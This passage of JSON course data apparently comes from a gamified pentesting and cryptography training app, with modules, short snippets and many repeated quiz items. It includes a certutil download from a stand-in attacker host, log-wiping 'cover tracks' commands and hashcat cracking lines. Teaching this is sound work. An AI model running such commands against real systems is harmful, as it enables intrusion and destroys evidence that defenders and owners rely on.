records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Built-in DLL dump?","opts":["ProcDump","comsvcs.dll","Task Manager","Mimikatz"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"file-xfer","cat":"Post-Exploitation","title":"File Transfer","diff":1,"xp":100,"intro":"Move files to/from targets.","sections":[{"type":"text","content":"Move files to/from targets."},{"type":"code","lang":"bash","content":"python3 -m http.server 8080\ncertutil -urlcache -split -f http://atk/file.exe file.exe"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Windows built-in downloader?","opts":["notepad","certutil","calc","cmd"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"cleanup","cat":"Post-Exploitation","title":"Post-Exploit Cleanup","diff":2,"xp":125,"intro":"Cover tracks.","sections":[{"type":"text","content":"Cover tracks."},{"type":"code","lang":"bash","content":"echo > /var/log/auth.log\nhistory -c\nwevtutil cl Security"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why cleanup?","opts":["Avoid detection","Restore environment to pre-test state","Speed","Disk space"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"process-hollow","cat":"Post-Exploitation","title":"Process Hollowing","diff":3,"xp":250,"intro":"Replace process memory.","sections":[{"type":"text","content":"Replace process memory."},{"type":"code","lang":"bash","content":"# Create suspended process\n# Unmap memory\n# Write malicious code\n# Resume"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why evades detection?","opts":["Encrypted","Runs under legitimate process name","Faster","Less resources"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"dll-inject","cat":"Post-Exploitation","title":"DLL Injection","diff":3,"xp":200,"intro":"Inject DLLs into processes.","sections":[{"type":"text","content":"Inject DLLs into processes."},{"type":"code","lang":"bash","content":"# OpenProcess \u2192 VirtualAllocEx \u2192 WriteProcessMemory \u2192 CreateRemoteThread"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Reflective DLL injection?","opts":["Kernel","Loading DLL from memory without touching disk","Reflection API","Mirror"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"wmi-persist","cat":"Post-Exploitation","title":"WMI Persistence","diff":3,"xp":200,"intro":"Persistent via WMI events.","sections":[{"type":"text","content":"Persistent via WMI events."},{"type":"code","lang":"bash","content":"# Event filter + consumer + binding\n# Triggers on logon, timer, process start"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why WMI stealthy?","opts":["Encrypted","No files on disk, lives in WMI repository","Fast","HTTPS"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"hash-basics","cat":"Cryptography","title":"Hashing Fundamentals","diff":1,"xp":75,"intro":"One-way hash functions.","sections":[{"type":"text","content":"One-way hash functions."},{"type":"code","lang":"bash","content":"echo -n 'password' | md5sum\necho -n 'password' | sha256sum"},{"type":"text","content":"Cryptography protects everything in modern computing: passwords, communications, financial transactions, and identity. Understanding it means knowing both the math (how it works) and the pitfalls (how it breaks). Most crypto failures aren't from broken algorithms \u2014 they're from implementation mistakes: reused keys, weak randomness, and improper modes."},{"type":"tip","content":"Never implement your own cryptography. Use well-tested libraries (libsodium, OpenSSL, Bouncy Castle). The difference between secure and broken often comes down to a single parameter choice \u2014 ECB vs GCM, PKCS#1 v1.5 vs OAEP, MD5 vs Argon2. Know which to use and why."},{"type":"task","content":"Write a Python script that encrypts a file with AES-GCM (authenticated encryption). Then intentionally break it: try ECB mode and see the penguin problem, reuse a nonce and observe the failure, tamper with the ciphertext and verify that GCM detects it. Understanding failures teaches more than success."},{"type":"quiz","q":"Hash one-way property?","opts":["Speed","Cannot reverse to find original","Output size","Collision resistance"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"hash-crack","cat":"Cryptography","title":"Hash Cracking","diff":1,"xp":100,"intro":"GPU-accelerated cracking.","sections":[{"type":"text","content":"GPU-accelerated cracking."},{"type":"code","lang":"bash","content":"hashcat -m 0 hashes.txt rockyou.txt   # MD5\nhashcat -m 1000 hashes.txt rockyou.txt # NTLM"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Hashcat mode 1000?","opts":["MD5","NTLM","SHA-256","bcrypt"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature 